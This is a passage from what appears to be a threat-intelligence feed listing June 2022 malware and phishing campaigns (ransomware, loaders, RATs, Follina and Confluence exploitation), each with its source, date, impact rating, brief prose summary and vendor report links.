- LOW
- Summary:
- Researchers at Kaspersky ICS CERT have spotted a threat actor targeting organizations in the industrial, telecommunications, logistics and transport sectors in Pakistan, Afghanistan and Malaysia, exploiting the Microsoft Exchange server vulnerability (CVE-2021-26855) and downloading the ShadowPad backdoor.
—
- Intel Source:
- ASEC
- Intel Name:
- Software_Cracks_Distributing_Recordbreaker_Stealer
- Date of Scan:
- 2022-06-28
- Impact:
- LOW
- Summary:
- ASEC Research Team has analysed
—
- Intel Source:
- CERT-UA
- Intel Name:
- DarkCrystal_RAT_malware_attacking_Ukraining_telecom_operators
- Date of Scan:
- 2022-06-27
- Impact:
- LOW
- Summary:
- CERT-UA received information about a DarkCrystal RAT attack aimed at operators and telecommunications providers in Ukraine. It was distributed by e-mails with the subject “Free primary legal aid” and the attachment “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar”.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Python_malicious_script_executing_a_keylogger
- Date of Scan:
- 2022-06-27
- Impact:
- LOW
- Summary:
- A researcher from ISC.SANS discovered a Python script with some interesting features that can be used to conduct social engineering attacks.
Source:
https://isc.sans.edu/forums/diary/Python+abusing+The+Windows+GUI/28780/
—
- Intel Source:
- Esentire
- Intel Name:
- Socgholish_initiated_through_Cobalt_Strike_payloads
- Date of Scan:
- 2022-06-27
- Impact:
- LOW
- Summary:
- eSentire has observed that drive-by threats such as SocGholish, Gootkit Loader and Solarmarker are on the rise. Both SocGholish and Gootkit Loader have been linked to follow-on attacks initiated through Cobalt Strike payloads.
Source:
https://www.esentire.com/blog/socgholish-to-cobalt-strike-in-10-minutes
—
- Intel Source:
- Cybereason
- Intel Name:
- BlackBastaRansomware
- Date of Scan:
- 2022-06-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Cybereason analyzed the BlackBasta ransomware attack and provided key details about its growth since inception.
Source:
https://www.cybereason.com/blog/cybereason-vs.-black-basta-ransomware
—
- Intel Source:
- CISA
- Intel Name:
- Log4Shell_exploits_still_being_used_to_hack_VMware_servers
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
—
- Intel Source:
- Group-IB
- Intel Name:
- Conti_ArmAttack_Campaign
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- Group-IB researchers documented a new Conti ransomware campaign dubbed ARMattack. In this campaign the group compromised more than 40 companies, and it took them 3 days to do so.
—
- Intel Source:
- SecureWorks
- Intel Name:
- BRONZ_STARLIGHT_Ransomware_Operations_levearge_HUI_Loader
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Secureworks CTU have observed a China-linked state-sponsored hacking group named Bronze Starlight deploying various ransomware families to hide the true intent of its attacks.
Source:
https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader
—
- Intel Source:
- ClearSky
- Intel Name:
- New_malware_associated_with_Iranian_SiameseKitten_Group_or_Lyceum
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- Researchers at ClearSky Security have discovered a new malware linked with the Lyceum group. The malware is downloaded from a domain registered on June 6th, and it communicates with a previously unknown command and control server whose IP address is adjacent to that of the domain.
Source:
https://www.clearskysec.com/wp-content/uploads/2022/06/Lyceum-suicide-drone-23.6.pdf
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_Ransomware_being_distributed_using_Copyright_related_Emails
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- The ASEC Research team has discovered the distribution of LockBit ransomware via phishing e-mails disguised as copyright claim e-mails. The phishing e-mail carries a compressed file as an attachment that contains another compressed file inside.
—
- Intel Source:
- Sekoia
- Intel Name:
- CALISTO_Russian_Threat_Actor_continues_its_credential_harvesting_campaign
- Date of Scan:
- 2022-06-24
- Impact:
- MEDIUM
- Summary:
- The Sekoia Threat & Detection Research Team followed up on the Google TAG finding on the Russian threat actor CALISTO and identified a phishing campaign in which CALISTO uses Evilginx on its VPS to capture the victim’s credentials. This well-known open source tool creates an SSL reverse proxy between the victim and a legitimate website to capture web credentials and 2FA tokens.
Source:
https://blog.sekoia.io/calisto-continues-its-credential-harvesting-campaign/
—
- Intel Source:
- Palo Alto
- Intel Name:
- AA_distribution_Qakbot_with_DarkVNC_and_Cobalt Strike
- Date of Scan:
- 2022-06-23
- Impact:
- MEDIUM
- Summary:
- The Securonix Threat Intelligence unit has identified a new wave of QBot infections that further deliver DarkVNC and Cobalt Strike.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Chinese_Threat_actors_targets_Russian_Government_Agencies
- Date of Scan:
- 2022-06-23
- Impact:
- LOW
- Summary:
- CERT-UA researchers discovered malicious files that have been used to exploit vulnerabilities in MS Office. This attack has been linked to Chinese threat actors.
—
- Intel Source:
- Cyble
- Intel Name:
- Keona_Clipper_Leverages_Telegram_For_Anonymity
- Date of Scan:
- 2022-06-23
- Impact:
- LOW
- Summary:
- Cyble researchers found a post advertising a new clipper malware, namely “Keona Clipper.” Keona Clipper is wrapped in a Telegram bot, which gives it stealth and anonymity. Additionally, the malware disguises itself as a system file and sends victim details to a Telegram bot.
Source:
https://blog.cyble.com/2022/06/22/keona-clipper-leverages-telegram-for-anonymity/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Tropic_Trooper_APT_new_TTPs
- Date of Scan:
- 2022-06-22
- Impact:
- MEDIUM
- Summary:
- Check Point researchers shared findings on an infection chain, used by a group / activity cluster with ties to Tropic Trooper, that includes a previously undescribed loader (dubbed “Nimbda”) written in the Nim language.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malicious_PowerShell_attack_in_Cryptocurrency_Browser_Extensions
- Date of Scan:
- 2022-06-22
- Impact:
- LOW
- Summary:
- Researchers from SANS found a malicious PowerShell script targeting cryptocurrency browser apps and extensions.
—
- Intel Source:
- McAfee
- Intel Name:
- Rise_of_LNK_Malware
- Date of Scan:
- 2022-06-22
- Impact:
- MEDIUM
- Summary:
- Researchers at McAfee Labs have identified three campaigns in which attackers abuse Windows shortcut (LNK) files, making them extremely dangerous to common users. LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/
—
- Intel Source:
- Lab52
- Intel Name:
- MuddyWater’s_new_campagin_targetting_Middle_East
- Date of Scan:
- 2022-06-22
- Impact:
- MEDIUM
- Summary:
- The MuddyWater threat group, allegedly sponsored by the Iranian government and linked to the Iranian Revolutionary Guard, has maintained a “long-term” infection campaign targeting Middle East countries. Researchers from Lab52 found recent samples and discovered that the attackers might modify the malware's functionality in a later stage, based on the information obtained from the infected host, or at least use it to download and drop the next infection stage.
Source:
https://lab52.io/blog/muddywaters-light-first-stager-targetting-middle-east/
—
- Intel Source:
- BitDefender
- Intel Name:
- RIG_Exploit_campaign_rapidly_modified_Raccoon_malware_with_Dridex
- Date of Scan:
- 2022-06-22
- Impact:
- LOW
- Summary:
- Bitdefender researchers discovered that a RIG Exploit Kit campaign has rapidly adapted by replacing Raccoon malware with Dridex to make the most of the ongoing campaign.
—
- Intel Source:
- Kaspersky
- Intel Name:
- China_Linked_ToddyCat_APT_Pioneers_Novel_Spyware
- Date of Scan:
- 2022-06-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Kaspersky found that an APT group dubbed ToddyCat has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year. They also found a previously unknown passive backdoor they named Samurai and a new trojan dubbed Ninja Trojan.
—
- Intel Source:
- Cyble
- Intel Name:
- Quantum Software Possibly Linked to Lazarus APT group
- Date of Scan:
- 2022-06-22
- Impact:
- LOW
- Summary:
- Researchers from Cyble came across a post from a threat actor on a deep web forum advertising Quantum Software, an LNK-file-based builder with possible links to the Lazarus APT group.
Source:
https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/
—
- Intel Source:
- Resecurity
- Intel Name:
- Cybercriminals_levearging_Azure_Front_Door_service_in_Phishing_attacks
- Date of Scan:
- 2022-06-21
- Impact:
- LOW
- Summary:
- Researchers at Resecurity have identified a phishing campaign delivered via Microsoft's Azure Front Door (AFD) service. This allows the bad actors to trick users and spread phishing content in order to intercept credentials for business applications and e-mail accounts.
Source:
https://resecurity.com/blog/article/cybercriminals-use-azure-front-door-in-phishing-attacks
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Avos_Ransomware_adds_new_Arsenal
- Date of Scan:
- 2022-06-21
- Impact:
- MEDIUM
- Summary:
- Researchers from Cisco Talos found a month-long AvosLocker ransomware campaign in which the threat actors leveraged Cobalt Strike, Sliver and multiple commercial network scanners.
Source:
https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- APT28_levarging_CredoMap_Malware_to-target_Ukraine
- Date of Scan:
- 2022-06-21
- Impact:
- LOW
- Summary:
- CERT-UA has analysed a phishing email carrying a malicious document attachment on the topic of nuclear terrorism. Opening it leads to the download of an HTML file and the execution of JavaScript code (CVE-2022-30190), which further downloads and launches the CredoMap malware.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0098_targeting_Ukraine_Critical_Infrastructure_facilities
- Date of Scan:
- 2022-06-21
- Impact:
- LOW
- Summary:
- CERT-UA has analysed a phishing email carrying malicious document attachments that open an HTML file and execute JavaScript code (CVE-2022-30190), which further downloads and runs the malicious program Cobalt Strike Beacon.
—
- Intel Source:
- Zscaler
- Intel Name:
- Voicemail_themed_Phishing_attacks_targeting_industries_in_US
- Date of Scan:
- 2022-06-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Zscaler ThreatLabz have identified and are monitoring the activities of a threat actor that targets users in various US-based organizations with malicious voicemail-notification-themed emails in an attempt to steal their Office 365 and Outlook credentials.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Client_side_Magecart_attacks_still_around_but_more_covert
- Date of Scan:
- 2022-06-20
- Impact:
- MEDIUM
- Summary:
- Malwarebytes researchers report that Magecart client-side attacks are still around, though some changes have taken place in the threat landscape. Newly reported domains are linked with an ‘anti-VM’ skimmer. One thing known is that if the Magecart threat actors decided to switch their operations exclusively server-side, the majority of companies would lose visibility overnight.
—
- Intel Source:
- CyberInt
- Intel Name:
- BlackGuard_Infostealer
- Date of Scan:
- 2022-06-20
- Impact:
- LOW
- Summary:
- Researchers at CyberInt discovered campaigns abusing gaming forums and Discord channels to distribute BlackGuard, along with a new data exfiltration technique using Telegram.
Source:
https://cyberint.com/blog/research/blackguard-stealer/
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_HWP_Files_distributed_through_PC_messengers
- Date of Scan:
- 2022-06-17
- Impact:
- LOW
- Summary:
- The ASEC Research team has discovered the active distribution of APT files that exploit a feature of HWP files and have been targeting South Korean users for a long time.
—
- Intel Source:
- S2W INC
- Intel Name:
- New_Version_of_Raccon_Stealer
- Date of Scan:
- 2022-06-17
- Impact:
- LOW
- Summary:
- Researchers from S2W Inc shared details on the new version of Raccoon Stealer and its operator, who announced on the dark web forum “Exploit” that, after three and a half months of temporary suspension, V2 of the stealer is operational.
Source:
https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d
—
- Intel Source:
- Trendmicro
- Intel Name:
- CopperStealer_Malware_infecting_via_websites_hosting_fake_software
- Date of Scan:
- 2022-06-17
- Impact:
- MEDIUM
- Summary:
- Trend Micro noticed a new version of CopperStealer whose infection vector starts with a website offering fake cracks, followed by two stages of the attack: a cryptor and a dropper.
Source:
https://www.trendmicro.com/de_de/research/22/f/websites-hosting-fake-cracks-spread-updated-copperstealer.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/f/websites-hosting-fake-cracks-spread-updated-copperstealer-malware/IOCs-websites-hosting-fake-cracks-spread-updated-copperstealer.txt
—
- Intel Source:
- Fortinet
- Intel Name:
- New_IceLoader_malware_3_0
- Date of Scan:
- 2022-06-17
- Impact:
- MEDIUM
- Summary:
- While hunting for new malware families written in the Nim programming language, FortiGuard Labs discovered a loader malware with the strings “ICE_X” and “v3.0”. A loader is a type of malware that is intended for downloading and executing additional payloads provided by a threat actor to further their malicious objectives.
Source:
https://www.fortinet.com/blog/threat-research/new-icexloader-3-0-developers-warm-up-to-nim
—
- Intel Source:
- Cyble
- Intel Name:
- Cerber2021_Ransomware_Back_In_Action
- Date of Scan:
- 2022-06-17
- Impact:
- MEDIUM
- Summary:
- Cyble Research Labs has analysed a sample of Cerber2021 ransomware, which suggests that threat actors exploit recently patched/unpatched Atlassian vulnerabilities to deliver the ransomware.
Source:
https://blog.cyble.com/2022/06/17/cerber2021-ransomware-back-in-action/
https://otx.alienvault.com/indicator/domain/pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malspam_pushes_Matanbuchus_malware
- Date of Scan:
- 2022-06-17
- Impact:
- LOW
- Summary:
- Researchers from SANS found a malicious campaign pushing the Matanbuchus malware, which leads to Cobalt Strike.
—
- Intel Source:
- Sophos
- Intel Name:
- Confluence_exploits_leveraged_to_drop_ransomware_payloads
- Date of Scan:
- 2022-06-16
- Impact:
- MEDIUM
- Summary:
- Researchers at SophosLabs have identified attackers leveraging Confluence exploits against vulnerable Windows servers, dropping Cerber ransomware, pushing down Cobalt Strike shellcode and running PowerShell commands.
—
- Intel Source:
- SocInvestigations
- Intel Name:
- QBot_returns_with_new_TTPs
- Date of Scan:
- 2022-06-16
- Impact:
- LOW
- Summary:
- SocInvestigation detection and response analysts detected the banking trojan QBot coming back with new TTPs: distribution via XLSB and via XLTM files.
Source:
https://www.socinvestigation.com/qbot-returns-returns-with-new-ttps-detection-response/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Houdini_RAT_leveraging_JavaScript_Dropper
- Date of Scan:
- 2022-06-16
- Impact:
- LOW
- Summary:
- Houdini is leveraging a phishing email with a ZIP archive that contains a JavaScript file called “New-Order.js”.
—
- Intel Source:
- Volexity
- Intel Name:
- Zero_Day_Sophos_Firewall_Exploitation_and_an_Insidious_Breach_by_DriftingCloud_threat_actor
- Date of Scan:
- 2022-06-16
- Impact:
- MEDIUM
- Summary:
- Volexity observed an attack involving a backdoored Sophos Firewall. This particular attack leveraged a zero-day exploit to compromise the customer’s firewall. The attacker was also observed implementing an interesting webshell backdoor, creating a secondary form of persistence, and ultimately launching attacks against the customer’s staff. These attacks aimed to further breach the cloud-hosted web servers hosting the organization’s public-facing websites.
Source:
https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
https://github.com/volexity/threat-intel/blob/main/2022/2022-06-15%20DriftingCloud%20-%20Zero-Day%20Sophos%20Firewall%20Exploitation%20and%20an%20Insidious%20Breach/indicators/indicators.csv
—
- Intel Source:
- Qualys
- Intel Name:
- New_Redline_InfoStealer_campaign
- Date of Scan:
- 2022-06-16
- Impact:
- LOW
- Summary:
- Qualys researchers found a new Redline InfoStealer campaign which spreads via fake cracked software hosted on Discord’s content delivery network.
—
- Intel Source:
- Cofense
- Intel Name:
- Monkeypox_phishing_outbreak
- Date of Scan:
- 2022-06-16
- Impact:
- LOW
- Summary:
- Cofense’s Phishing Defence Center has seen attempts to deceive enterprise staff with a series of monkeypox themed phishing emails. As this rare infection spreads around the globe and gains media attention, attackers are likely to continue tweaking their tactics.
Source:
https://cofense.com/blog/monkeypox-phishing-outbreak-becomes-latest-lure
—
- Intel Source:
- Qualys
- Intel Name:
- Potential_attack_vector_using_Follina_Vulnerability
- Date of Scan:
- 2022-06-15
- Impact:
- MEDIUM
- Summary:
- Qualys researchers have examined a potential attack vector as well as technical details of the Follina vulnerability.
—
- Intel Source:
- Cyble
- Intel Name:
- Hydra_Android_Distributed_Via_Play_Store
- Date of Scan:
- 2022-06-15
- Impact:
- LOW
- Summary:
- During the routine threat hunting exercise, Cyble Research Labs came across a Twitter Post wherein the researcher mentioned an Android malware variant published on the Play Store. The variant in question acts as a Hostile Downloader and downloads the Hydra Banking Trojan.
Source:
https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/
https://twitter.com/AndroidInSecure/status/1534175436187500548
—
- Intel Source:
- Sophos
- Intel Name:
- Old_Telerik_vulnerability_exploitation_delivering_cryptominer_and_CobaltStrike_infections
- Date of Scan:
- 2022-06-15
- Impact:
- LOW
- Summary:
- Researchers from Sophos discovered an unknown threat actor exploiting a three-year-old vulnerability (CVE-2019-18935) in the Telerik UI web application framework to take control of web servers, writing Cobalt Strike beacons (in the form of a DLL payload) to disk, then using the beacon to execute encoded PowerShell commands that downloaded further malware.
—
- Intel Source:
- Akamai
- Intel Name:
- Panchan_Botnet_targeting_Linux_servers
- Date of Scan:
- 2022-06-15
- Impact:
- MEDIUM
- Summary:
- Researchers at Akamai have discovered Panchan, a new peer-to-peer botnet and SSH worm that has been actively breaching Linux servers. Panchan is written in Golang and utilizes its built-in concurrency features to maximize spreadability and execute malware modules.
Source:
https://www.akamai.com/blog/security/new-p2p-botnet-panchan
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Saitama_backdoor_using_DNS_tunneling
- Date of Scan:
- 2022-06-15
- Impact:
- LOW
- Summary:
- Researchers identified that the Saitama backdoor was used in a phishing e-mail that targeted a government official from Jordan’s foreign ministry, in an attack attributed to the Iranian group APT34.
—
- Intel Source:
- Zscaler
- Intel Name:
- PureCrypter_dropping_RATs_and_InfoStealer
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
- Summary:
- Zscaler researchers documented the workings of a fully-featured malware loader dubbed PureCrypter that is being purchased by cyber criminals to deliver remote access trojans (RATs) and information stealers.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter
—
- Intel Source:
- Esentire
- Intel Name:
- Purple_Fox_malware_analysis
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
- Summary:
- eSentire’s Threat Response Unit (TRU) team recently observed multiple Purple Fox infections. The malware targets vulnerable versions of Internet Explorer (IE). The infection starts with the execution of a malicious script via mshta.exe, a utility that runs Microsoft HTML Applications (HTA) files.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-purple-fox
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_IP2Scam_tech_support_campaign_scammers
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
- Summary:
- Malwarebytes breaks down what they call the IP2Scam tech support scheme by going back in time to track previously used infrastructure.
Source:
https://blog.malwarebytes.com/threat-intelligence/2022/06/taking-down-the-ip2scam-tech-support-campaign/
https://github.com/MBThreatIntel/TSS/blob/master/digital_ocean_IP2Scam.csv
—
- Intel Source:
- Jamf
- Intel Name:
- ChromeLoader_adware_halted_from_broadcasting_by_Jamf_Protect
- Date of Scan:
- 2022-06-14
- Impact:
- MEDIUM
- Summary:
- CrowdStrike researchers tracked an adware campaign that injects ads into Chrome and Safari browsers on macOS. Victims are tricked into opening a DMG file and running a shell script which masquerades as a legitimate installer application.
—
- Intel Source:
- Avast
- Intel Name:
- New_Linux_Rootkit_Syslogk
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
- Summary:
- Researchers from Avast spotted a new Linux rootkit, dubbed ‘Syslogk,’ that uses specially crafted “magic packets” to activate a dormant backdoor on the device.
—
- Intel Source:
- Confiant
- Intel Name:
- How_SeaFlower_installs_backdoors_in_iOS_Android_web3_wallets
- Date of Scan:
- 2022-06-14
- Impact:
- MEDIUM
- Summary:
- Confiant believes SeaFlower is the most technically sophisticated threat targeting web3 users, right after the infamous Lazarus Group.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Iranian_phishing_campaign_linked_to_Phosphorous_APT_group
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
—
- Intel Source:
- Palo Alto
- Intel Name:
- HelloXD_ransomware_and_links_with_x4k_threat_actor
- Date of Scan:
- 2022-06-13
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto noticed increased activity of Hello XD ransomware, whose operators are now deploying an upgraded sample featuring stronger encryption.
Source:
https://unit42.paloaltonetworks.com/helloxd-ransomware/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Chinese_APT_GALLIUM_levarges_PingPull_RAT_in_Cyberespionage_Campaigns
- Date of Scan:
- 2022-06-13
- Impact:
- MEDIUM
- Summary:
- Unit 42 recently identified a new, difficult-to-detect remote access trojan named PingPull being used by GALLIUM, an advanced persistent threat (APT) group.
Source:
https://unit42.paloaltonetworks.com/pingpull-gallium/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0113_Sandworm_Group_targeting_media_organisations_in_Ukraine
- Date of Scan:
- 2022-06-13
- Impact:
- LOW
- Summary:
- CERT-UA has analysed a phishing email targeting media organizations in Ukraine with the subject “LIST of links to interactive maps” and an attached document of the same name. The malicious document delivers the CrescentImp malware. CERT-UA has tracked this activity with medium confidence to UAC-0113, which is associated with the Sandworm group.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Crypto_Miners_Leveraging_Atlassian_Zero_Day_Vulnerability
- Date of Scan:
- 2022-06-13
- Impact:
- MEDIUM
- Summary:
- Check Point Labs has uncovered how an unauthenticated attacker can use this Atlassian zero-day vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI.
Source:
https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/
—
- Intel Source:
- ZScaler
- Intel Name:
- Lyceum_NET_DNS_Backdoor
- Date of Scan:
- 2022-06-10
- Impact:
- MEDIUM
- Summary:
- The Iranian Lyceum APT hacking group uses a new .NET-based DNS backdoor to conduct attacks on companies in the energy and telecommunication sectors.
Source:
https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Credit_card_skimmer_evades_Virtual_Machines
- Date of Scan:
- 2022-06-10
- Impact:
- LOW
- Summary:
- In this blog post Malwarebytes Labs shows how a Magecart threat actor distributing a digital skimmer is avoiding researchers, and possibly sandboxes, by ensuring that users are running genuine computers and not virtual machines.
—
- Intel Source:
- BlackBerry
- Intel Name:
- Symbiote_malware_detected_in_Linux
- Date of Scan:
- 2022-06-10
- Impact:
- LOW
- Summary:
- Researchers have identified the Symbiote malware, which harvests credentials and provides remote access for the threat actor.
Source:
https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat
—
- Intel Source:
- SentinelOne
- Intel Name:
- Aoqin_Dragon_Chinese_linked_APT_spying_for_10_years
- Date of Scan:
- 2022-06-09
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has uncovered a cluster of activity primarily targeting organizations in Southeast Asia and Australia. The threat actor’s primary focus is espionage, with targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. This activity is tracked as ‘Aoqin Dragon’. Attacks attributable to Aoqin Dragon typically drop one of two backdoors: Mongall or a modified version of the open source Heyoka project.
—
- Intel Source:
- The Hacker News
- Intel Name:
- State_Backed_Hackers_Exploit_Microsoft_Follina_Bug_to_Target_Entities_in_Europe_and_U.S
- Date of Scan:
- 2022-06-09
- Impact:
- MEDIUM
- Summary:
- A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office “Follina” vulnerability to target government entities in Europe and the U.S.
Source:
https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html
—
- Intel Source:
- ISC.SANS
HelpNet Security
- Intel Name:
- TA570_exploiting_Follina_to_deliver_Qbot_Malware
- Date of Scan:
- 2022-06-09
- Impact:
- MEDIUM
- Summary:
- Researchers at ISC.SANS and HelpNet Security have found that the malicious DLL files used for Qakbot infections contain a tag indicating their specific distribution channel. This wave of malicious spam ultimately provided two separate methods of Qakbot infection. The first method is one also used by other threat actors, where a disk image contains a Windows shortcut that runs a malicious hidden DLL. The second method is a Word docx file using a CVE-2022-30190 (Follina) exploit.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malvertising_campaign_leads_to_fake_Firefox_update
- Date of Scan:
- 2022-06-09
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes came across a malvertising campaign leading to a fake Firefox update.
—
- Intel Source:
- Lacework blog
- Intel Name:
- Kinsing_&_Dark_IoT_botnet_among_threats_targeting_CVE_2022_26134
- Date of Scan:
- 2022-06-09
- Impact:
- MEDIUM
- Summary:
- Details regarding the recent Confluence OGNL (CVE-2022-26134) exploit were released to the public on June 3rd 2022, with Lacework seeing multiple attacks in the wild from both uncategorized and named threats. As of yesterday Lacework has observed active exploitation by known cloud threat malware families such as Kinsing, “Hezb”, and the Dark.IoT botnet, and provides a current inventory of the top threats seen exploiting this latest Confluence vulnerability.
Source:
https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/
—
- Intel Source:
- NCC Group
- Intel Name:
- Black_Basta_Ransomware_leverage_QBot_for_lateral_movement
- Date of Scan:
- 2022-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers at NCC Group spotted a new partnership between the Black Basta ransomware group and the QBot malware operation.
Source:
https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- Spam_Campaign_targeting_victims_with_SVCReady_Malware
- Date of Scan:
- 2022-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers at HP Wolf Security have identified new malicious spam campaigns spreading a previously unknown malware family called ‘SVCReady’. The malware is notable for the unusual way it is delivered to target PCs: using shellcode hidden in the properties of Microsoft Office documents.
Source:
https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
—
- Intel Source:
- Cyble blog
- Intel Name:
- Bumblebee_Loader_on_the_rise
- Date of Scan:
- 2022-06-08
- Impact:
- MEDIUM
- Summary:
- In March 2022, a new malware named “Bumblebee” was discovered and reportedly distributed via spam campaigns. Researchers identified that Bumblebee is a replacement for the BazarLoader malware, which has delivered Conti ransomware in the past. Bumblebee acts as a downloader and delivers known attack frameworks and open-source tools such as Cobalt Strike, shellcode, Sliver and Meterpreter. It also downloads other types of malware such as ransomware and trojans. Cyble intelligence indicates that incidents of Bumblebee infection are on the rise.
Source:
https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/
—
- Intel Source:
- Qi Anxin Threat Intelligence Center
- Intel Name:
- Operation_Tejas
- Date of Scan:
- 2022-06-08
- Impact:
- LOW
- Summary:
- Qi Anxin Threat Intelligence Center previously published the article “Operation Magichm: A Brief Talk on the Manlinghua Organization’s CHM File Delivery and Follow-up Operations” in 2021. In addition to the new attack methods and samples used in the latest attack in April, the center also provides an overview of the recent phishing activities of Maya Elephant (APT-Q-41) and the basics of Diamondback (APT-Q-39) this year.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Cuba_Ransomware_Group_new_variant
- Date of Scan:
- 2022-06-08
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro observed that the Cuba ransomware authors appear to be pushing updates to the current binary, resulting in a new variant.
—
- Intel Source:
- Avast
- Intel Name:
- Fake_cracked_software_spreading_Crypto_Stealing_malware
- Date of Scan:
- 2022-06-08
- Impact:
- LOW
- Summary:
- Users who download cracked software risk sensitive personal data being stolen by hackers.
—
- Intel Source:
- NCC Group
- Intel Name:
- Black_Basta_Ransomware_targeting_ESXi_servers
- Date of Scan:
- 2022-06-07
- Impact:
- MEDIUM
- Summary:
- Black Basta is the latest ransomware gang to add support for encrypting VMware ESXi virtual machines (VMs) running on enterprise Linux servers.
Source:
https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Popping_Eagle_Malware
- Date of Scan:
- 2022-06-07
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto have identified an unknown piece of malware dubbed Popping Eagle, whose activity includes performing a specially crafted DLL hijacking attack. Researchers also observed the attacker following the DLL hijacking with several network scans and lateral movement steps.
Source:
https://unit42.paloaltonetworks.com/popping-eagle-malware/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Spam_Email_Contains_BitRat_Malware
- Date of Scan:
- 2022-06-07
- Impact:
- LOW
- Summary:
- Researchers at ISC.SANS have analysed a zipped email attachment containing a very large ISO/EXE file; after the file was executed in a sandbox, it started communicating with a BitRat C2 site.
—
- Intel Source:
- Cadosecurity
- Intel Name:
- WatchDog_Evolves_With_a_New_Multi-Stage_Cryptojacking_Attack
- Date of Scan:
- 2022-06-07
- Impact:
- MEDIUM
- Summary:
- Cado Labs’ honeypot infrastructure was recently compromised by a complex, multi-stage cryptojacking attack.
—
- Intel Source:
- DFIR Report
- Intel Name:
- Exploitation_of_ManageEngine_SupportCenter_Plus
- Date of Scan:
- 2022-06-07
- Impact:
- LOW
- Summary:
- The DFIR Report observed a threat actor gain initial access to an organization by exploiting a vulnerability in ManageEngine SupportCenter Plus. The threat actor discovered files on the server and dumped credentials using a web shell, moved laterally to key servers using Plink and RDP, and exfiltrated sensitive information using the web shell and RDP.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Mindware_Ransomware
- Date of Scan:
- 2022-06-07
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne have analysed Mindware ransomware and its similarities with SFile ransomware, and provided technical indicators.
—
- Intel Source:
- Fortinet
- Intel Name:
- Travel_Themed_attacks_surges_by_multiple_RATs
- Date of Scan:
- 2022-06-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have noted multiple RAT campaigns that use travel-themed lures to target would-be travellers. The RATs include AsyncRAT, NetWire RAT and Quasar RAT.
Source:
https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers
—
- Intel Source:
- NetSkope
- Intel Name:
